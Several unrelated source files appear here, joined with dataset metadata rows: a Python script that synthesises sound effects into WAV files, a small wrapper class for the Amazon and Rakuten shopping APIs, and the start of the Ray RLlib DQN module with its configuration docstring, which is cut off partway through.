adsr(v(f=840.*(3/4.),fv=0.,nu=0.,d=.1,tab=Tr_i),S=-3.,R=10.),
adsr(v(f=840.,fv=0.,nu=0.,d=.1,tab=Tr_i),S=-3.,R=10.),
))))
w.write('msgNeg2.wav', f_a, N(H((
adsr(v(f=840.*(3/4.),fv=0.,nu=0.,d=.1,tab=Tr_i),S=-3.,R=10.),
adsr(v(f=840.,fv=0.,nu=0.,d=.1,tab=Tr_i),S=-3.,R=10.),
adsr(v(f=840.*(3/4.),fv=0.,nu=0.,d=.1,tab=Tr_i),S=-3.,R=10.),
))))
w.write('msgNeg3.wav', f_a, N(H((
adsr(v(f=840.,fv=0.,nu=0.,d=.1,tab=Tr_i),S=-3.,R=10.),
adsr(v(f=840.*(3/4.),fv=0.,nu=0.,d=.1,tab=Tr_i),S=-3.,R=10.),
))))
w.write('msgPos3.wav', f_a, N(H((
adsr(v(f=840.*(3/4.),fv=0.,nu=0.,d=.1,tab=Tr_i),S=-3.,R=10.),
adsr(v(f=840.,fv=0.,nu=0.,d=.1,tab=Tr_i),S=-3.,R=10.),
adsr(v(f=840.*(2**(4./12)),fv=0.,nu=0.,d=.1,tab=Tr_i),S=-3.,R=10.),
adsr(v(f=840.,fv=0.,nu=0.,d=.1,tab=Tr_i),S=-3.,R=10.),
))))
w.write('msgPos4.wav', f_a, N(H((
adsr(v(f=840.*(3/4.),fv=0.,nu=0.,d=.1,tab=Tr_i),S=-3.,R=10.),
adsr(v(f=840.,fv=0.,nu=0.,d=.1,tab=Tr_i),S=-3.,R=10.),
adsr(v(f=840.*(2**(4./12)),fv=0.,nu=0.,d=.1,tab=Tr_i),S=-3.,R=10.),
adsr(v(f=840.*(2**(7./12)),fv=0.,nu=0.,d=.1,tab=Tr_i),S=-3.,R=10.),
adsr(v(f=840.,fv=0.,nu=0.,d=.1,tab=Tr_i),S=-3.,R=10.),
))))
w.write('msgNeg4.wav', f_a, N(H((
adsr(v(f=840.,fv=0.,nu=0.,d=.1,tab=Tr_i),S=-3.,R=10.),
adsr(v(f=840.*(2**(-6./12)),fv=0.,nu=0.,d=.1,tab=Tr_i),S=-3.,R=10.),
))))
w.write('perda.wav', f_a, N(H((
adsr(v(f=840.,fv=0.,nu=0.,d=.1, tab=D_i),S=-3.,R=10.),
adsr(v(f=840.*(2**(-6./12)),fv=0.,nu=0.,d=.1,tab=D_i),S=-3.,R=10.),
))))
w.write('ganho.wav', f_a, N(H((
adsr(v(f=840.*(2**(-7./12)),fv=0.,nu=0.,d=.1,tab=D_i),S=-3.,R=10.),
adsr(v(f=840.,fv=0.,nu=0.,d=.1, tab=D_i),S=-3.,R=10.),
))))
w.write('ganho2.wav', f_a, N(H((
adsr(v(f=840.,fv=0.,nu=0.,d=.075, tab=D_i),S=-3.,R=10.,A=5.,D=10.),
adsr(v(f=840.,fv=0.,nu=0.,d=.025, tab=D_i),S=-3.,R=10.,A=5.,D=10.),
adsr(v(f=840.,fv=0.,nu=0.,d=.05, tab=D_i),S=-3.,R=10.,A=5.,D=10.),
adsr(v(f=840.,fv=0.,nu=0.,d=.05, tab=D_i),S=-3.,R=5.,A=5.,D=10.),
))))
w.write('ganho3.wav', f_a, N(H((
adsr(v(f=240.,fv=0.,nu=0.,d=.75, tab=D_i),S=-9.,R=10.,A=5.,D=610.),
adsr(v(f=240.*(2.**(-7/12.)),fv=0.,nu=0.,d=.25, tab=D_i),S=-9.,R=10.,A=5.,D=210.),
adsr(v(f=240.*(2.**(4/12.)),fv=0.,nu=0.,d=.5, tab=D_i), S=-9.,R=10.,A=5., D=410.),
adsr(v(f=240.*(2.**(0/12.)),fv=0.,nu=0.,d=.5, tab=D_i), S=-9.,R=5.,A=5., D=410.),
))))
w.write('ganho4.wav', f_a, N(H((
adsr(v(f=240.,fv=0.,nu=0.,d=.175, tab=D_i),S=-9.,R=10.,A=5.,D=60.),
adsr(v(f=240.*(2.**(-7/12.)),fv=0.,nu=0.,d=.25, tab=D_i),S=-9.,R=10.,A=5.,D=210.),
adsr(v(f=240.*(2.**(4/12.)),fv=0.,nu=0.,d=.105, tab=D_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(0/12.)),fv=0.,nu=0.,d=.105, tab=D_i), S=-9.,R=5.,A=5., D=40.),
))))
w.write('ganho5.wav', f_a, N(H((
adsr(v(f=240.,fv=0.,nu=0.,d=.175, tab=D_i),S=-9.,R=10.,A=5.,D=60.),
adsr(v(f=240.*(2.**(7/12.)),fv=0.,nu=0.,d=.25, tab=D_i),S=-9.,R=10.,A=5.,D=210.),
adsr(v(f=240.*(2.**(4/12.)),fv=0.,nu=0.,d=.105, tab=D_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(0/12.)),fv=0.,nu=0.,d=.105, tab=D_i), S=-9.,R=5.,A=5., D=40.),
))))
w.write('ganho6.wav', f_a, N(H((
adsr(v(f=240.,fv=0.,nu=0.,d=.175, tab=D_i),S=-9.,R=10.,A=5.,D=60.),
adsr(v(f=240.*(2.**(7/12.)),fv=0.,nu=0.,d=.25, tab=D_i),S=-9.,R=10.,A=5.,D=210.),
adsr(v(f=240.*(2.**(4/12.)),fv=0.,nu=0.,d=.105, tab=D_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(12./12.)),fv=0.,nu=0.,d=.105, tab=D_i), S=-9.,R=5.,A=5., D=40.),
))))
w.write('perda2.wav', f_a, N(H((
adsr(v(f=240.,fv=0.,nu=0.,d=.25, tab=D_i),S=-9.,R=10.,A=5.,D=60.)+
adsr(v(f=240.*(2.**(6/12.)),fv=0.,nu=0.,d=.25, tab=D_i),S=-9.,R=10.,A=5.,D=210.),
adsr(v(f=240.*(2.**(4/12.)),fv=0.,nu=0.,d=.105, tab=D_i), S=-9.,R=10.,A=5., D=40.)+
adsr(v(f=240.*(2.**(3./12.)),fv=0.,nu=0.,d=.105, tab=D_i), S=-9.,R=5.,A=5., D=40.),
))))
w.write('perda3.wav', f_a, N(H((
adsr(v(f=240.,fv=0.,nu=0.,d=.25, tab=D_i),S=-9.,R=10.,A=5.,D=60.)+
adsr(v(f=240.*(2.**(6/12.)),fv=0.,nu=0.,d=.25, tab=D_i),S=-9.,R=10.,A=5.,D=210.),
))))
w.write('perda4.wav', f_a, N(H((
adsr(v(f=240.*(2.**(4/12.)),fv=0.,nu=0.,d=.105, tab=D_i), S=-9.,R=10.,A=5., D=40.)+
adsr(v(f=240.*(2.**(3./12.)),fv=0.,nu=0.,d=.105, tab=D_i), S=-9.,R=5.,A=5., D=40.),
))))
w.write('perda5.wav', f_a, N(H((
adsr(v(f=240.*(2.**(0/12.)),fv=0.,nu=0.,d=.105, tab=D_i), S=-9.,R=10.,A=5., D=40.)+
adsr(v(f=240.*(2.**(11./12.)),fv=0.,nu=0.,d=.105, tab=D_i), S=-9.,R=5.,A=5., D=40.),
))))
w.write('ganhoX.wav', f_a, N(H((
adsr(v(f=240.*(2.**(0/12.)),fv=0.,nu=0., d=.065, tab=Q_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(11./12.)),fv=0.,nu=0.,d=.065, tab=Q_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(0/12.)),fv=0.,nu=0., d=.065, tab=Q_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(0/12.)),fv=0.,nu=0., d=.065, tab=Q_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(0/12.)),fv=0.,nu=0., d=.065, tab=Q_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(11./12.)),fv=0.,nu=0.,d=.065, tab=Q_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(11./12.)),fv=0.,nu=0.,d=.065, tab=D_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(11./12.)),fv=0.,nu=0.,d=.065, tab=Q_i), S=-9.,R=5.,A=5., D=40.),
))))
w.write('ganhoX2.wav', f_a, N(H((
adsr(v(f=240.*(2.**(0/12.)),fv=0.,nu=0., d=.065, tab=Q_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(11./12.)),fv=0.,nu=0.,d=.065, tab=Q_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(6/12.)),fv=0.,nu=0., d=.065, tab=Q_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(0/12.)),fv=0.,nu=0., d=.065, tab=Q_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(-1/12.)),fv=0.,nu=0., d=.065, tab=Q_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(11./12.)),fv=0.,nu=0.,d=.065, tab=Q_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(6./12.)),fv=0.,nu=0.,d=.065, tab=D_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(0./12.)),fv=0.,nu=0.,d=.065, tab=Q_i), S=-9.,R=5.,A=5., D=40.),
))))
w.write('ganhoX3.wav', f_a, N(H((
adsr(v(f=240.*(2.**(0/12.)),fv=0. ,nu=10., d=.065, tab=Q_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(11./12.)),fv=0.,nu=10.,d=.065, tab=Q_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(6/12.)),fv=0. ,nu=10., d=.065, tab=Q_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(0/12.)),fv=0. ,nu=10., d=.065, tab=Q_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(-1/12.)),fv=0. ,nu=10., d=.065, tab=Q_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(11./12.)),fv=0.,nu=10.,d=.065, tab=Q_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(6./12.)),fv=0. ,nu=10.,d=.065, tab=D_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(0./12.)),fv=0. ,nu=10.,d=.065, tab=Q_i), S=-9.,R=5.,A=5., D=40.),
))))
w.write('perdaX4.wav', f_a, N(H((
adsr(v(f=240.*(2.**(0/12.)) , fv=100. ,nu=10., d=.065, tab=Q_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(11./12.)),fv=100.,nu=10.,d=.065, tab=Q_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(6/12.)), fv=100. ,nu=10., d=.065, tab=Q_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(0/12.)) , fv=100. ,nu=10., d=.065, tab=Q_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(-1/12.)), fv=100. ,nu=10., d=.065, tab=Q_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(11./12.)),fv=100.,nu=10.,d=.065, tab=Q_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(6./12.)), fv=100. ,nu=10.,d=.065, tab=D_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(0./12.)), fv=100. ,nu=10.,d=.065, tab=Q_i), S=-9.,R=5.,A=5., D=40.),
))))
w.write('perdaX5.wav', f_a, N(H((
adsr(v(f=240.*(2.**(0/12.)) , fv=200. ,nu=10., d=.065, tab=Q_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(11./12.)),fv=200.,nu=10.,d=.065, tab=Q_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(6/12.)), fv=200. ,nu=10., d=.065, tab=Q_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(0/12.)) , fv=200. ,nu=10., d=.065, tab=Q_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(-1/12.)), fv=200. ,nu=10., d=.065, tab=Q_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(11./12.)),fv=200.,nu=10.,d=.065, tab=Q_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(6./12.)), fv=200. ,nu=10.,d=.065, tab=D_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(0./12.)), fv=200. ,nu=10.,d=.065, tab=Q_i), S=-9.,R=5.,A=5., D=40.),
))))
w.write('videogame.wav', f_a, N(H((
adsr(v(f=240.*(2.**(0/12.)),fv=0.,nu=0., d=.065, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(4./12.)),fv=0.,nu=0.,d=.065, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(7/12.)),fv=0.,nu=0., d=.065, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(7/12.)),fv=0.,nu=0., d=.065, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(4/12.)),fv=0.,nu=0., d=.065, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(0./12.)),fv=0.,nu=0.,d=.065, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(7./12.)),fv=0.,nu=0.,d=.065, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(0./12.)),fv=0.,nu=0.,d=.065, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(0/12.)),fv=0.,nu=0., d=.65, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(11./12.)),fv=0.,nu=0.,d=.065, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(12/12.)),fv=0.,nu=0., d=.065, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(11/12.)),fv=0.,nu=0., d=.65, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(12/12.)),fv=0.,nu=0., d=.065, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(0./12.)),fv=0.,nu=0.,d=.65, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(6./12.)),fv=0.,nu=0.,d=.065, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(-1./12.)),fv=0.,nu=0.,d=.65, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(0/12.)),fv=0.,nu=0., d=.065, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(11./12.)),fv=0.,nu=0.,d=.065, tab=Q_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(12/12.)),fv=0.,nu=0., d=.5, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(14/12.)),fv=0.,nu=0., d=.065, tab=Q_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(16/12.)),fv=0.,nu=0., d=.5, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(17./12.)),fv=0.,nu=0.,d=.065, tab=Q_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(19./12.)),fv=0.,nu=0.,d=.65, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(12./12.)),fv=0.,nu=0.,d=.065, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
))))
w.write('videogame2.wav', f_a, N(H((
adsr(v(f=240.*(2.**(0/12.)),fv=0.,nu=0., d=.065*4, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(4./12.)),fv=0.,nu=0.,d=.0652*2, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(7/12.)),fv=0.,nu=0., d=.065, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(7/12.)),fv=0.,nu=0., d=.065, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(4/12.)),fv=0.,nu=0., d=.065, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(0./12.)),fv=0.,nu=0.,d=.065, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(7./12.)),fv=0.,nu=0.,d=.065, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(0./12.)),fv=0.,nu=0.,d=.065, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(0/12.)),fv=0.,nu=0., d=.065, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(11./12.)),fv=0.,nu=0.,d=.065, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(12/12.)),fv=0.,nu=0., d=.065, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(11/12.)),fv=0.,nu=0., d=.065*4, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(12/12.)),fv=0.,nu=0., d=.065, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(0./12.)),fv=0.,nu=0.,d=.065, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(6./12.)),fv=0.,nu=0.,d=.065, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(-1./12.)),fv=0.,nu=0.,d=.065*2, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(0/12.)),fv=0.,nu=0., d=.065, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(11./12.)),fv=0.,nu=0.,d=.065, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(12/12.)),fv=0.,nu=0., d=.065, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(14/12.)),fv=0.,nu=0., d=.065*4, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(16/12.)),fv=0.,nu=0., d=.065, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(17./12.)),fv=0.,nu=0.,d=.065, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(19./12.)),fv=0.,nu=0.,d=.065*2, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(12./12.)),fv=0.,nu=0.,d=.065, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
))))
w.write('videogame3.wav', f_a, N(H((
adsr(v(f=240.*(2.**(0/12.)),fv=0.,nu=0., d=.065*4, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(4./12.)),fv=0.,nu=0.,d=.0652*2, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(7/12.)),fv=0.,nu=0., d=.065, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(7/12.)),fv=0.,nu=0., d=.065, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(4/12.)),fv=0.,nu=0., d=.065, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(0./12.)),fv=0.,nu=0.,d=.065*3, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(7./12.)),fv=0.,nu=0.,d=.065, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(0./12.)),fv=0.,nu=0.,d=.065, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(0/12.)),fv=0.,nu=0., d=.065, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(11./12.)),fv=0.,nu=0.,d=.065*3, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(12/12.)),fv=0.,nu=0., d=.065, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(11/12.)),fv=0.,nu=0., d=.065*4, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(12/12.)),fv=0.,nu=0., d=.065, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(0./12.)),fv=0.,nu=0.,d=.065, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(6./12.)),fv=0.,nu=0.,d=.065, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(-1./12.)),fv=0.,nu=0.,d=.065*2, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(0/12.)),fv=0.,nu=0., d=.065*3, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(11./12.)),fv=0.,nu=0.,d=.065, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(12/12.)),fv=0.,nu=0., d=.065, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(14/12.)),fv=0.,nu=0., d=.065*4, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(16/12.)),fv=0.,nu=0., d=.065, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(17./12.)),fv=0.,nu=0.,d=.065, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(19./12.)),fv=0.,nu=0.,d=.065*2, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(12./12.)),fv=0.,nu=0.,d=.065, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
))))
w.write('videogame4.wav', f_a, N(H((
adsr(v(f=240.*(2.**(0/12.)),fv=0.,nu=0., d=.065*4, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(4./12.)),fv=0.,nu=0.,d=.0652*2, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(7/12.)),fv=0.,nu=0., d=.065, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(7/12.)),fv=0.,nu=0., d=.065, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(4/12.)),fv=0.,nu=0., d=.065, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(0./12.)),fv=0.,nu=0.,d=.065*3, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(7./12.)),fv=0.,nu=0.,d=.065, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(0./12.)),fv=0.,nu=0.,d=.065, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(0/12.)),fv=0.,nu=0., d=.065*5, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(11./12.)),fv=0.,nu=0.,d=.065*3, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(12/12.)),fv=0.,nu=0., d=.065, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(11/12.)),fv=0.,nu=0., d=.065*4, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(12/12.)),fv=0.,nu=0., d=.065, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(0./12.)),fv=0.,nu=0.,d=.065, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(2./12.)),fv=0.,nu=0.,d=.065, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(-1./12.)),fv=0.,nu=0.,d=.065*2, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(0/12.)),fv=0.,nu=0., d=.065*3, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(11./12.)),fv=0.,nu=0.,d=.065, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(12/12.)),fv=0.,nu=0., d=.065*4, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(14/12.)),fv=0.,nu=0., d=.065*4, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(16/12.)),fv=0.,nu=0., d=.065, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(17./12.)),fv=0.,nu=0.,d=.065, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(19./12.)),fv=0.,nu=0.,d=.065*2, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(12./12.)),fv=0.,nu=0.,d=.065, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
))))
# open all the gritoFala* files
# run them through a band-pass that only lets some mids through
# save them as tv_gritoFala*
#
#c = n.zeros(len(coefs))
#c[1000:10000] = n.exp(1j*n.random.uniform(0, 2*n.pi, 9000))
#
## real par, imaginaria impar
#c[Lambda/2+1:] = n.real(c[1:Lambda/2])[::-1] - 1j * \
# n.imag(c[1:Lambda/2])[::-1]
#
#resp_imp= n.fft.ifft(c)
#resp_imp_= n.real(resp_imp)
#import os
#
#ll=os.listdir(".")
#ll=[lll for lll in ll if "gritoFala" in lll]
#for i in ll:
# print i
# foo=n.convolve(w.read("%s"%(i,))[1],resp_imp)
# w.write('tv_%s'%(i,), f_a, N(foo))
# print i
#
| unlicense | 4,547,374,845,288,080,000 | 45.390826 | 216 | 0.425859 | false |
AkihikoITOH/capybara | capybara/capybara.py | 1 | 1091 | #!/bin/python
# -*- coding: utf-8 -*-
import os
from amazon_wrapper import AmazonWrapper
from rakuten_wrapper import RakutenWrapper
class Capybara:
def __init__(self, config_dir=None, tokens_dir=None):
self.wrappers = {}
self.wrappers['amazon'] = AmazonWrapper()
self.wrappers['rakuten'] = RakutenWrapper()
for service, wrapper in self.wrappers.items():
config_filename = './%s_config.json' % service
tokens_filename = './%s_tokens.tsv' % service
config_path = os.path.normpath(os.path.join(os.getcwd(), config_dir, config_filename))
tokens_path = os.path.normpath(os.path.join(os.getcwd(), tokens_dir, tokens_filename))
wrapper.setup(config_path, tokens_path)
def get(self, service=None, item=None):
return self.wrappers[service].access_wrapper({'item': item})
def isAvailable(self, service=None):
if service is None:
return False
try:
if self.wrappers[service]:
return True
except:
return False
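# Illustrative usage sketch (added, not part of the original module). The
# directory names and the item id below are assumptions; only the Capybara
# methods defined above are used.
if __name__ == '__main__':
    capybara = Capybara(config_dir='config', tokens_dir='tokens')
    if capybara.isAvailable(service='amazon'):
        print(capybara.get(service='amazon', item='B00EXAMPLE'))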
| mit | -303,462,010,463,526,900 | 33.09375 | 98 | 0.613199 | false |
Wapaul1/ray | python/ray/rllib/dqn/dqn.py | 1 | 14408 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import time
import numpy as np
import pickle
import os
import tensorflow as tf
import ray
from ray.rllib.common import Agent, TrainingResult
from ray.rllib.dqn import logger, models
from ray.rllib.dqn.common.wrappers import wrap_dqn
from ray.rllib.dqn.common.schedules import LinearSchedule
from ray.rllib.dqn.replay_buffer import ReplayBuffer, PrioritizedReplayBuffer
"""The default configuration dict for the DQN algorithm.
dueling: bool
whether to use dueling dqn
double_q: bool
whether to use double dqn
hiddens: array<int>
hidden layer sizes of the state and action value networks
model: dict
config options to pass to the model constructor
lr: float
learning rate for adam optimizer
schedule_max_timesteps: int
max num timesteps for annealing schedules
timesteps_per_iteration: int
number of env steps to optimize for before returning
buffer_size: int
size of the replay buffer
exploration_fraction: float
fraction of entire training period over which the exploration rate is
annealed
exploration_final_eps: float
final value of random action probability
sample_batch_size: int
update the replay buffer with this many samples at once
num_workers: int
the number of workers to use for parallel batch sample collection
train_batch_size: int
size of a batched sampled from replay buffer for training
print_freq: int
how often to print out training progress
set to None to disable printing
learning_starts: int
how many steps of the model to collect transitions for before learning
starts
gamma: float
discount factor
grad_norm_clipping: int or None
if not None, clip gradients during optimization at this value
target_network_update_freq: int
update the target network every `target_network_update_freq` steps.
prioritized_replay: True
if True prioritized replay buffer will be used.
prioritized_replay_alpha: float
alpha parameter for prioritized replay buffer
prioritized_replay_beta0: float
initial value of beta for prioritized replay buffer
prioritized_replay_beta_iters: int
number of iterations over which beta will be annealed from initial
value to 1.0. If set to None equals to schedule_max_timesteps
prioritized_replay_eps: float
epsilon to add to the TD errors when updating priorities.
num_cpu: int
number of cpus to use for training
"""
DEFAULT_CONFIG = dict(
dueling=True,
double_q=True,
hiddens=[256],
model={},
gpu_offset=0,
lr=5e-4,
schedule_max_timesteps=100000,
